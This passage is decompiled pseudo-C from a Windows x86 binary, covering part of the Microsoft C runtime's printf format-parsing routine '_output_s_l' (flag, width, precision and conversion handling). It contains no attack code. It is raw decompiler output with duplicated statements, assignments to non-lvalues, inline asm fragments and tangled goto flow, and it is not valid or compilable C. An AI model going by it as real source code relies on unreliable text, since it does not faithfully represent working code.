    											 *(_t627 - 0xc) = 0;
    											_t512 = E00B91090( *(_t627 - 0x251) & 0x000000ff, E00B7C680(_t627 - 0x40));
    											_t633 = _t630 + 8;
    											__eflags = _t512;
    											if(_t512 == 0) {
    												L24:
    												E00B95DE0( *(_t627 - 0x251) & 0x000000ff,  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    												_t630 = _t633 + 0xc;
    												goto L218;
    											} else {
    												E00B95DE0( *((intOrPtr*)(_t627 + 8)),  *(_t627 - 0x251) & 0x000000ff,  *((intOrPtr*)(_t627 + 8)), _t627 - 0x24c);
    												_t633 = _t633 + 0xc;
    												_t572 =  *( *(_t627 + 0xc));
    												 *(_t627 - 0x251) =  *( *(_t627 + 0xc));
    												_t598 =  *(_t627 + 0xc) + 1;
    												__eflags = _t598;
    												 *(_t627 + 0xc) = _t598;
    												asm("sbb eax, eax");
    												 *(_t627 - 0x27c) =  ~( ~( *(_t627 - 0x251)));
    												if(_t598 == 0) {
    													_push(L"(ch != _T(\'\\0\'))");
    													_push(0);
    													_push(0x486);
    													_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
    													_push(2);
    													_t524 = L00B7D760();
    													_t633 = _t633 + 0x14;
    													__eflags = _t524 - 1;
    													if(_t524 == 1) {
    														asm("int3");
    													}
    												}
    												L22:
    												__eflags =  *(_t627 - 0x27c);
    												if( *(_t627 - 0x27c) != 0) {
    													goto L24;
    												} else {
    													 *((intOrPtr*)(L00B80C60(_t572))) = 0x16;
    													E00B809F0(_t558, _t572, _t625, _t626, L"(ch != _T(\'\\0\'))", L"_output_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x486, 0);
    													 *(_t627 - 0x2f4) = 0xffffffff;
    													E00B7C650(_t627 - 0x40);
    													_t502 =  *(_t627 - 0x2f4);
    													goto L229;
    												}
    											}
    										case 1:
    											L25:
    											 *(__ebp - 0x2c) = 0;
    											__edx =  *(__ebp - 0x2c);
    											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
    											__eax =  *(__ebp - 0x28);
    											 *(__ebp - 0x18) =  *(__ebp - 0x28);
    											__ecx =  *(__ebp - 0x18);
    											 *(__ebp - 0x1c) = __ecx;
    											 *(__ebp - 0x10) = 0;
    											 *(__ebp - 0x30) = 0xffffffff;
    											 *(__ebp - 0xc) = 0;
    											goto L218;
    										case 2:
    											L26:
    											__edx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x31c) =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    											 *(__ebp - 0x31c) =  *(__ebp - 0x31c) - 0x20;
    											__eflags =  *(__ebp - 0x31c) - 0x10;
    											if( *(__ebp - 0x31c) > 0x10) {
    												goto L33;
    											}
    											L27:
    											__ecx =  *(__ebp - 0x31c);
    											_t73 = __ecx + 0xb95d08; // 0x498d04
    											__edx =  *_t73 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t73 & 0x000000ff) * 4 +  &M00B95CF0))) {
    												case 0:
    													goto L30;
    												case 1:
    													goto L31;
    												case 2:
    													goto L29;
    												case 3:
    													goto L28;
    												case 4:
    													goto L32;
    												case 5:
    													goto L33;
    											}
    										case 3:
    											L34:
    											__edx =  *((char*)(__ebp - 0x251));
    											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    											if( *((char*)(__ebp - 0x251)) != 0x2a) {
    												__eax =  *(__ebp - 0x18);
    												__eax =  *(__ebp - 0x18) * 0xa;
    												__eflags = __eax;
    												__ecx =  *((char*)(__ebp - 0x251));
    												_t97 = __ecx - 0x30; // -48
    												__edx = __eax + _t97;
    												 *(__ebp - 0x18) = __eax + _t97;
    											} else {
    												__eax = __ebp + 0x14;
    												 *(__ebp - 0x18) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x18);
    												if( *(__ebp - 0x18) < 0) {
    													__ecx =  *(__ebp - 0x10);
    													__ecx =  *(__ebp - 0x10) | 0x00000004;
    													__eflags = __ecx;
    													 *(__ebp - 0x10) = __ecx;
    													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    													 *(__ebp - 0x18) =  ~( *(__ebp - 0x18));
    												}
    											}
    											goto L218;
    										case 4:
    											L40:
    											 *(__ebp - 0x30) = 0;
    											goto L218;
    										case 5:
    											L41:
    											__eax =  *((char*)(__ebp - 0x251));
    											__eflags =  *((char*)(__ebp - 0x251)) - 0x2a;
    											if( *((char*)(__ebp - 0x251)) != 0x2a) {
    												__edx =  *(__ebp - 0x30);
    												__edx =  *(__ebp - 0x30) * 0xa;
    												__eflags = __edx;
    												_t108 =  *((char*)(__ebp - 0x251)) - 0x30; // -48
    												__ecx = __edx + _t108;
    												 *(__ebp - 0x30) = __ecx;
    											} else {
    												__ecx = __ebp + 0x14;
    												 *(__ebp - 0x30) = E00B93D50(__ebp + 0x14);
    												__eflags =  *(__ebp - 0x30);
    												if( *(__ebp - 0x30) < 0) {
    													 *(__ebp - 0x30) = 0xffffffff;
    												}
    											}
    											goto L218;
    										case 6:
    											L47:
    											__edx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x320) =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    											 *(__ebp - 0x320) =  *(__ebp - 0x320) - 0x49;
    											__eflags =  *(__ebp - 0x320) - 0x2e;
    											if( *(__ebp - 0x320) > 0x2e) {
    												L70:
    												goto L218;
    											}
    											L48:
    											__ecx =  *(__ebp - 0x320);
    											_t116 = __ecx + 0xb95d30; // 0x553e9003
    											__edx =  *_t116 & 0x000000ff;
    											switch( *((intOrPtr*)(( *_t116 & 0x000000ff) * 4 +  &M00B95D1C))) {
    												case 0:
    													L53:
    													__edx =  *(__ebp + 0xc);
    													__eax =  *( *(__ebp + 0xc));
    													__eflags =  *( *(__ebp + 0xc)) - 0x36;
    													if( *( *(__ebp + 0xc)) != 0x36) {
    														L56:
    														__edx =  *(__ebp + 0xc);
    														__eax =  *( *(__ebp + 0xc));
    														__eflags =  *( *(__ebp + 0xc)) - 0x33;
    														if( *( *(__ebp + 0xc)) != 0x33) {
    															L59:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc));
    															__eflags =  *( *(__ebp + 0xc)) - 0x64;
    															if( *( *(__ebp + 0xc)) == 0x64) {
    																L65:
    																L67:
    																goto L70;
    															}
    															L60:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx;
    															__eflags =  *__ecx - 0x69;
    															if( *__ecx == 0x69) {
    																goto L65;
    															}
    															L61:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc));
    															__eflags = __ecx - 0x6f;
    															if(__ecx == 0x6f) {
    																goto L65;
    															}
    															L62:
    															__edx =  *(__ebp + 0xc);
    															__eax =  *( *(__ebp + 0xc));
    															__eflags =  *( *(__ebp + 0xc)) - 0x75;
    															if( *( *(__ebp + 0xc)) == 0x75) {
    																goto L65;
    															}
    															L63:
    															__ecx =  *(__ebp + 0xc);
    															__edx =  *__ecx;
    															__eflags =  *__ecx - 0x78;
    															if( *__ecx == 0x78) {
    																goto L65;
    															}
    															L64:
    															__eax =  *(__ebp + 0xc);
    															__ecx =  *( *(__ebp + 0xc));
    															__eflags = __ecx - 0x58;
    															if(__ecx != 0x58) {
    																 *(__ebp - 0x25c) = 0;
    																goto L18;
    															}
    															goto L65;
    														}
    														L57:
    														__ecx =  *(__ebp + 0xc);
    														__edx =  *((char*)(__ecx + 1));
    														__eflags =  *((char*)(__ecx + 1)) - 0x32;
    														if( *((char*)(__ecx + 1)) != 0x32) {
    															goto L59;
    														} else {
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    															 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    															__ecx =  *(__ebp - 0x10);
    															__ecx =  *(__ebp - 0x10) & 0xffff7fff;
    															 *(__ebp - 0x10) = __ecx;
    															goto L67;
    														}
    													}
    													L54:
    													__ecx =  *(__ebp + 0xc);
    													__edx =  *((char*)(__ecx + 1));
    													__eflags =  *((char*)(__ecx + 1)) - 0x34;
    													if( *((char*)(__ecx + 1)) != 0x34) {
    														goto L56;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 2;
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00008000;
    														 *(__ebp - 0x10) = __ecx;
    														goto L67;
    													}
    												case 1:
    													L68:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000020;
    													goto L70;
    												case 2:
    													L49:
    													__eax =  *(__ebp + 0xc);
    													__ecx =  *( *(__ebp + 0xc));
    													__eflags = __ecx - 0x6c;
    													if(__ecx != 0x6c) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000010;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													} else {
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    														 *(__ebp + 0xc) =  *(__ebp + 0xc) + 1;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00001000;
    													}
    													goto L70;
    												case 3:
    													L69:
    													__eax =  *(__ebp - 0x10);
    													__eax =  *(__ebp - 0x10) | 0x00000800;
    													__eflags = __eax;
    													 *(__ebp - 0x10) = __eax;
    													goto L70;
    												case 4:
    													goto L70;
    											}
    										case 7:
    											L71:
    											__ecx =  *((char*)(__ebp - 0x251));
    											 *(__ebp - 0x324) = __ecx;
    											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    											 *(__ebp - 0x324) =  *(__ebp - 0x324) - 0x41;
    											__eflags =  *(__ebp - 0x324) - 0x37;
    											if( *(__ebp - 0x324) > 0x37) {
    												goto L190;
    												do {
    													do {
    														while(1) {
    															L190:
    															if( *(_t627 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    														L186:
    														__ebp - 0x49 = __ebp - 0x49 -  *(__ebp - 4);
    														 *(__ebp - 0x24) = __ebp - 0x49 -  *(__ebp - 4);
    														__ecx =  *(__ebp - 4);
    														__ecx =  *(__ebp - 4) + 1;
    														 *(__ebp - 4) = __ecx;
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000200;
    														__eflags =  *(__ebp - 0x10) & 0x00000200;
    													} while (( *(__ebp - 0x10) & 0x00000200) == 0);
    													__eflags =  *(__ebp - 0x24);
    													if( *(__ebp - 0x24) == 0) {
    														break;
    													}
    													L188:
    													__eax =  *(__ebp - 4);
    													__ecx =  *( *(__ebp - 4));
    													__eflags = __ecx - 0x30;
    												} while (__ecx == 0x30);
    												L189:
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												 *(__ebp - 4) =  *(__ebp - 4) - 1;
    												__eax =  *(__ebp - 4);
    												 *( *(__ebp - 4)) = 0x30;
    												__ecx =  *(__ebp - 0x24);
    												__ecx =  *(__ebp - 0x24) + 1;
    												__eflags = __ecx;
    												 *(__ebp - 0x24) = __ecx;
    												while(1) {
    													L190:
    													if( *(_t627 - 0x28) != 0) {
    														goto L216;
    													}
    													goto L191;
    												}
    											}
    											L72:
    											_t157 =  *(__ebp - 0x324) + 0xb95d9c; // 0xcccccc0d
    											__ecx =  *_t157 & 0x000000ff;
    											switch( *((intOrPtr*)(__ecx * 4 +  &M00B95D60))) {
    												case 0:
    													L122:
    													 *(__ebp - 0x2c) = 1;
    													__ecx =  *((char*)(__ebp - 0x251));
    													__ecx =  *((char*)(__ebp - 0x251)) + 0x20;
    													__eflags = __ecx;
    													 *((char*)(__ebp - 0x251)) = __cl;
    													goto L123;
    												case 1:
    													L73:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__eax =  *(__ebp - 0x10);
    														__eax =  *(__ebp - 0x10) | 0x00000800;
    														__eflags = __eax;
    														 *(__ebp - 0x10) = __eax;
    													}
    													goto L75;
    												case 2:
    													L88:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000830;
    													__eflags =  *(__ebp - 0x10) & 0x00000830;
    													if(( *(__ebp - 0x10) & 0x00000830) == 0) {
    														__ecx =  *(__ebp - 0x10);
    														__ecx =  *(__ebp - 0x10) | 0x00000800;
    														__eflags = __ecx;
    														 *(__ebp - 0x10) = __ecx;
    													}
    													goto L90;
    												case 3:
    													L146:
    													 *(__ebp - 0x260) = 7;
    													goto L148;
    												case 4:
    													L81:
    													__eax = __ebp + 0x14;
    													 *(__ebp - 0x288) = E00B93D50(__ebp + 0x14);
    													__eflags =  *(__ebp - 0x288);
    													if( *(__ebp - 0x288) == 0) {
    														L83:
    														__edx =  *0xd121a0; // 0xb775a0
    														 *(__ebp - 4) = __edx;
    														__eax =  *(__ebp - 4);
    														 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    														L87:
    														goto L190;
    													}
    													L82:
    													__ecx =  *(__ebp - 0x288);
    													__eflags =  *(__ecx + 4);
    													if( *(__ecx + 4) != 0) {
    														L84:
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000800;
    														__eflags =  *(__ebp - 0x10) & 0x00000800;
    														if(( *(__ebp - 0x10) & 0x00000800) == 0) {
    															 *(__ebp - 0xc) = 0;
    															__edx =  *(__ebp - 0x288);
    															__eax =  *(__edx + 4);
    															 *(__ebp - 4) =  *(__edx + 4);
    															__ecx =  *(__ebp - 0x288);
    															__edx =  *__ecx;
    															 *(__ebp - 0x24) =  *__ecx;
    														} else {
    															__edx =  *(__ebp - 0x288);
    															__eax =  *(__edx + 4);
    															 *(__ebp - 4) =  *(__edx + 4);
    															__ecx =  *(__ebp - 0x288);
    															__eax =  *__ecx;
    															asm("cdq");
    															 *__ecx - __edx =  *__ecx - __edx >> 1;
    															 *(__ebp - 0x24) =  *__ecx - __edx >> 1;
    															 *(__ebp - 0xc) = 1;
    														}
    														goto L87;
    													}
    													goto L83;
    												case 5:
    													L123:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													__eax = __ebp - 0x248;
    													 *(__ebp - 4) = __ebp - 0x248;
    													 *(__ebp - 0x44) = 0x200;
    													__eflags =  *(__ebp - 0x30);
    													if( *(__ebp - 0x30) >= 0) {
    														L125:
    														__eflags =  *(__ebp - 0x30);
    														if( *(__ebp - 0x30) != 0) {
    															L128:
    															__eflags =  *(__ebp - 0x30) - 0x200;
    															if( *(__ebp - 0x30) > 0x200) {
    																 *(__ebp - 0x30) = 0x200;
    															}
    															L130:
    															__eflags =  *(__ebp - 0x30) - 0xa3;
    															if( *(__ebp - 0x30) > 0xa3) {
    																 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																 *(__ebp - 0x20) = L00B7DEA0(__ecx,  *(__ebp - 0x30) + 0x15d, 2, "f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x6da);
    																__eflags =  *(__ebp - 0x20);
    																if( *(__ebp - 0x20) == 0) {
    																	 *(__ebp - 0x30) = 0xa3;
    																} else {
    																	__eax =  *(__ebp - 0x20);
    																	 *(__ebp - 4) =  *(__ebp - 0x20);
    																	 *(__ebp - 0x30) =  *(__ebp - 0x30) + 0x15d;
    																	 *(__ebp - 0x44) =  *(__ebp - 0x30) + 0x15d;
    																}
    															}
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															 *(__ebp + 0x14) =  *(__ebp + 0x14) + 8;
    															__eax =  *(__ebp + 0x14);
    															__ecx =  *(__eax - 8);
    															__edx =  *(__eax - 4);
    															 *(__ebp - 0x2a8) =  *(__eax - 8);
    															 *(__ebp - 0x2a4) =  *(__eax - 4);
    															__ecx = __ebp - 0x40;
    															_push(E00B7C680(__ebp - 0x40));
    															__eax =  *(__ebp - 0x2c);
    															_push( *(__ebp - 0x2c));
    															__ecx =  *(__ebp - 0x30);
    															_push( *(__ebp - 0x30));
    															__edx =  *((char*)(__ebp - 0x251));
    															_push( *((char*)(__ebp - 0x251)));
    															__eax =  *(__ebp - 0x44);
    															_push( *(__ebp - 0x44));
    															__ecx =  *(__ebp - 4);
    															_push( *(__ebp - 4));
    															__edx = __ebp - 0x2a8;
    															_push(__ebp - 0x2a8);
    															__eax =  *0xd12188; // 0xddc09d6c
    															__eax =  *__eax();
    															__esp = __esp + 0x1c;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    															__eflags =  *(__ebp - 0x10) & 0x00000080;
    															if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    																__eflags =  *(__ebp - 0x30);
    																if( *(__ebp - 0x30) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__edx =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__eax =  *0xd12194; // 0xddc09d6c
    																	__eax =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__ecx =  *((char*)(__ebp - 0x251));
    															__eflags =  *((char*)(__ebp - 0x251)) - 0x67;
    															if( *((char*)(__ebp - 0x251)) == 0x67) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    																__eflags =  *(__ebp - 0x10) & 0x00000080;
    																if(( *(__ebp - 0x10) & 0x00000080) == 0) {
    																	__ecx = __ebp - 0x40;
    																	_push(E00B7C680(__ebp - 0x40));
    																	__eax =  *(__ebp - 4);
    																	_push( *(__ebp - 4));
    																	__ecx =  *0xd12190; // 0xddc09d6c
    																	E00B849C0(__ecx) =  *__eax();
    																	__esp = __esp + 8;
    																}
    															}
    															__edx =  *(__ebp - 4);
    															__eax =  *( *(__ebp - 4));
    															__eflags =  *( *(__ebp - 4)) - 0x2d;
    															if( *( *(__ebp - 4)) == 0x2d) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    																__edx =  *(__ebp - 4);
    																__edx =  *(__ebp - 4) + 1;
    																__eflags = __edx;
    																 *(__ebp - 4) = __edx;
    															}
    															__eax =  *(__ebp - 4);
    															 *(__ebp - 0x24) = E00B805E0( *(__ebp - 4));
    															do {
    																L190:
    																if( *(_t627 - 0x28) != 0) {
    																	goto L216;
    																}
    																goto L191;
    															} while ( *(__ebp - 0x324) > 0x37);
    															goto L72;
    														}
    														L126:
    														__ecx =  *((char*)(__ebp - 0x251));
    														__eflags = __ecx - 0x67;
    														if(__ecx != 0x67) {
    															goto L128;
    														}
    														L127:
    														 *(__ebp - 0x30) = 1;
    														goto L130;
    													}
    													L124:
    													 *(__ebp - 0x30) = 6;
    													goto L130;
    												case 6:
    													L75:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    													__eflags =  *(__ebp - 0x10) & 0x00000810;
    													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    														__ebp + 0x14 = E00B93D50(__ebp + 0x14);
    														 *(__ebp - 0x284) = __ax;
    														__cl =  *(__ebp - 0x284);
    														 *(__ebp - 0x248) = __cl;
    														 *(__ebp - 0x24) = 1;
    													} else {
    														 *(__ebp - 0x280) = 0;
    														__edx = __ebp + 0x14;
    														__eax = E00B93D90(__ebp + 0x14);
    														 *(__ebp - 0x258) = __ax;
    														__eax =  *(__ebp - 0x258) & 0x0000ffff;
    														__ecx = __ebp - 0x248;
    														__edx = __ebp - 0x24;
    														 *(__ebp - 0x280) = E00B97890(__ebp - 0x24, __ebp - 0x248, 0x200,  *(__ebp - 0x258) & 0x0000ffff);
    														__eflags =  *(__ebp - 0x280);
    														if( *(__ebp - 0x280) != 0) {
    															 *(__ebp - 0x28) = 1;
    														}
    													}
    													__edx = __ebp - 0x248;
    													 *(__ebp - 4) = __ebp - 0x248;
    													while(1) {
    														L190:
    														if( *(_t627 - 0x28) != 0) {
    															goto L216;
    														}
    														goto L191;
    													}
    												case 7:
    													L143:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000040;
    													 *(__ebp - 8) = 0xa;
    													goto L153;
    												case 8:
    													goto L0;
    												case 9:
    													L151:
    													 *(__ebp - 8) = 8;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														__edx =  *(__ebp - 0x10);
    														__edx =  *(__ebp - 0x10) | 0x00000200;
    														__eflags = __edx;
    														 *(__ebp - 0x10) = __edx;
    													}
    													goto L153;
    												case 0xa:
    													L145:
    													 *(__ebp - 0x30) = 8;
    													goto L146;
    												case 0xb:
    													L90:
    													__eflags =  *(__ebp - 0x30) - 0xffffffff;
    													if( *(__ebp - 0x30) != 0xffffffff) {
    														__edx =  *(__ebp - 0x30);
    														 *(__ebp - 0x328) =  *(__ebp - 0x30);
    													} else {
    														 *(__ebp - 0x328) = 0x7fffffff;
    													}
    													__eax =  *(__ebp - 0x328);
    													 *(__ebp - 0x290) =  *(__ebp - 0x328);
    													__ecx = __ebp + 0x14;
    													 *(__ebp - 4) = E00B93D50(__ebp + 0x14);
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000810;
    													__eflags =  *(__ebp - 0x10) & 0x00000810;
    													if(( *(__ebp - 0x10) & 0x00000810) == 0) {
    														L101:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__edx =  *0xd121a0; // 0xb775a0
    															 *(__ebp - 4) = __edx;
    														}
    														__eax =  *(__ebp - 4);
    														 *(__ebp - 0x28c) =  *(__ebp - 4);
    														while(1) {
    															L104:
    															__ecx =  *(__ebp - 0x290);
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															__eflags = __ecx;
    															if(__ecx == 0) {
    																break;
    															}
    															L105:
    															__eax =  *(__ebp - 0x28c);
    															__ecx =  *( *(__ebp - 0x28c));
    															__eflags = __ecx;
    															if(__ecx == 0) {
    																break;
    															}
    															L106:
    															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    															 *(__ebp - 0x28c) =  *(__ebp - 0x28c) + 1;
    														}
    														L107:
    														__eax =  *(__ebp - 0x28c);
    														__eax =  *(__ebp - 0x28c) -  *(__ebp - 4);
    														__eflags = __eax;
    														 *(__ebp - 0x24) = __eax;
    														goto L108;
    													} else {
    														L94:
    														__eflags =  *(__ebp - 4);
    														if( *(__ebp - 4) == 0) {
    															__eax =  *0xd121a4; // 0xb77590
    															 *(__ebp - 4) = __eax;
    														}
    														 *(__ebp - 0xc) = 1;
    														__ecx =  *(__ebp - 4);
    														 *(__ebp - 0x294) =  *(__ebp - 4);
    														while(1) {
    															L97:
    															__edx =  *(__ebp - 0x290);
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															 *(__ebp - 0x290) =  *(__ebp - 0x290) - 1;
    															__eflags =  *(__ebp - 0x290);
    															if( *(__ebp - 0x290) == 0) {
    																break;
    															}
    															L98:
    															__ecx =  *(__ebp - 0x294);
    															__edx =  *( *(__ebp - 0x294)) & 0x0000ffff;
    															__eflags =  *( *(__ebp - 0x294)) & 0x0000ffff;
    															if(( *( *(__ebp - 0x294)) & 0x0000ffff) == 0) {
    																break;
    															}
    															L99:
    															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    															 *(__ebp - 0x294) =  *(__ebp - 0x294) + 2;
    														}
    														L100:
    														 *(__ebp - 0x294) =  *(__ebp - 0x294) -  *(__ebp - 4);
    														__ecx =  *(__ebp - 0x294) -  *(__ebp - 4) >> 1;
    														 *(__ebp - 0x24) = __ecx;
    														L108:
    														while(1) {
    															L190:
    															if( *(_t627 - 0x28) != 0) {
    																goto L216;
    															}
    															goto L191;
    														}
    													}
    												case 0xc:
    													L144:
    													 *(__ebp - 8) = 0xa;
    													goto L153;
    												case 0xd:
    													L147:
    													 *(__ebp - 0x260) = 0x27;
    													L148:
    													 *(__ebp - 8) = 0x10;
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000080;
    													__eflags =  *(__ebp - 0x10) & 0x00000080;
    													if(( *(__ebp - 0x10) & 0x00000080) != 0) {
    														 *((char*)(__ebp - 0x14)) = 0x30;
    														 *(__ebp - 0x260) =  *(__ebp - 0x260) + 0x51;
    														__eflags =  *(__ebp - 0x260) + 0x51;
    														 *((char*)(__ebp - 0x13)) = __al;
    														 *(__ebp - 0x1c) = 2;
    													}
    													L153:
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    													__eflags =  *(__ebp - 0x10) & 0x00008000;
    													if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    														 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    														__eflags =  *(__ebp - 0x10) & 0x00001000;
    														if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
    															__eflags =  *(__ebp - 0x10) & 0x00000020;
    															if(( *(__ebp - 0x10) & 0x00000020) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__edx = 0;
    																	__eflags = 0;
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = 0;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = __edx;
    																}
    															} else {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    																__eflags =  *(__ebp - 0x10) & 0x00000040;
    																if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    																	__ecx = __ebp + 0x14;
    																	E00B93D50(__ebp + 0x14) = __ax & 0x0000ffff;
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __ax & 0x0000ffff;
    																	 *(__ebp - 0x2b4) = __edx;
    																} else {
    																	__eax = __ebp + 0x14;
    																	__eax = E00B93D50(__ebp + 0x14);
    																	__ax = __eax;
    																	asm("cdq");
    																	 *(__ebp - 0x2b8) = __eax;
    																	 *(__ebp - 0x2b4) = __edx;
    																}
    															}
    														} else {
    															__eax = __ebp + 0x14;
    															 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    															 *(__ebp - 0x2b4) = __edx;
    														}
    													} else {
    														__ecx = __ebp + 0x14;
    														 *(__ebp - 0x2b8) = E00B93D70(__ebp + 0x14);
    														 *(__ebp - 0x2b4) = __edx;
    													}
    													 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
    													__eflags =  *(__ebp - 0x10) & 0x00000040;
    													if(( *(__ebp - 0x10) & 0x00000040) == 0) {
    														L170:
    														__ecx =  *(__ebp - 0x2b8);
    														 *(__ebp - 0x2c0) =  *(__ebp - 0x2b8);
    														__edx =  *(__ebp - 0x2b4);
    														 *(__ebp - 0x2bc) =  *(__ebp - 0x2b4);
    														goto L171;
    													} else {
    														L166:
    														__eflags =  *(__ebp - 0x2b4);
    														if(__eflags > 0) {
    															goto L170;
    														}
    														L167:
    														if(__eflags < 0) {
    															L169:
    															 *(__ebp - 0x2b8) =  ~( *(__ebp - 0x2b8));
    															__edx =  *(__ebp - 0x2b4);
    															asm("adc edx, 0x0");
    															__edx =  ~( *(__ebp - 0x2b4));
    															 *(__ebp - 0x2c0) =  ~( *(__ebp - 0x2b8));
    															 *(__ebp - 0x2bc) =  ~( *(__ebp - 0x2b4));
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000100;
    															L171:
    															 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
    															__eflags =  *(__ebp - 0x10) & 0x00008000;
    															if(( *(__ebp - 0x10) & 0x00008000) == 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
    																__eflags =  *(__ebp - 0x10) & 0x00001000;
    																if(( *(__ebp - 0x10) & 0x00001000) == 0) {
    																	__edx =  *(__ebp - 0x2c0);
    																	__eax =  *(__ebp - 0x2bc);
    																	__eax =  *(__ebp - 0x2bc) & 0x00000000;
    																	__eflags = __eax;
    																	 *(__ebp - 0x2bc) = __eax;
    																}
    															}
    															__eflags =  *(__ebp - 0x30);
    															if( *(__ebp - 0x30) >= 0) {
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0xfffffff7;
    																__eflags =  *(__ebp - 0x30) - 0x200;
    																if( *(__ebp - 0x30) > 0x200) {
    																	 *(__ebp - 0x30) = 0x200;
    																}
    															} else {
    																 *(__ebp - 0x30) = 1;
    															}
    															 *(__ebp - 0x2c0) =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
    															__eflags =  *(__ebp - 0x2c0) |  *(__ebp - 0x2bc);
